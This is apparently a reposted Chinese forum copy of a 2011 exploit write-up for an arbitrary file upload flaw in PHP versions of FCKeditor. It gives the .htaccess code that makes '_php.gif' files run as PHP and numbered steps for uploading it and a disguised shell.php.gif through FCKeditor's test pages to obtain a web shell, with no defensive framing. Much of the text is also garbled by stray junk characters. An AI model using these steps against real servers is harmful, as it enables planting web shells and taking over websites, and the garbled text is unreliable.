FCKeditor所有php版本Upload上传漏洞
7 Q1 a4 @1 z$ G! C/ I* S作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
& ?! _8 a& I B$ \. k" f! u减小字体 增大字体
1 j, |9 P8 a: T6 P$ ~. y" |' G[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability7 R9 u7 D, Y& s& U3 z) e& ~
[+] Date: 2011
- ^) n: c2 }+ a6 p4 K8 R1 a[+] Author : sinesafe.cn
. z( G# J. K( m; ]4 [[+] Website : WwW.sinesafe.cn3 Q/ `- C. J) W8 ~ Y5 {
———————————————————$ u* ]; O2 Z( i, G3 g& V
1.create a htaccess file:* a7 F, l0 k# {# t2 _/ q
code:1 h: T1 }5 U/ X; G% u
<FilesMatch “_php.gif”>: }; s( c" y* R4 \. E5 l" K
SetHandler application/x-httpd-php
( G8 \) o6 l5 j3 p; z</FilesMatch>2 [# R; M; Z) T5 r6 C H
! x$ o- u4 V, m x2.Now upload this htaccess with FCKeditor.
& J/ ?( E" w t) c1 }7 f9 z' J6 t$ v- h- o7 V) Z
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html' R: s U8 R+ G% m* O
[# u6 U# f' ?6 u& x/ N* Z
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html/ k3 V/ q3 b: O6 U% n+ n
; w! P7 ]$ X7 u6 `———————————————————————————————-0 Y( C R5 Q0 c6 Z# v' ]
3.Now upload shell.php.gif with FCKeditor.
2 j! _, w* x6 e2 j4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
/ J( o- R8 j# G/ f7 |5.http://www.sinesafe.cn/anything/shell_php.gif% O# p( N# [" I: q) M! o
6.Now shell is available from server. |
4 L0 V1 w! I3 F7 a
) b$ u# K! k( E7 ~4 I. m5 n
8 A6 ^+ |& S Y) S( N7 l
|
发表于 2013-10-27 17:25:21
收藏
支持
反对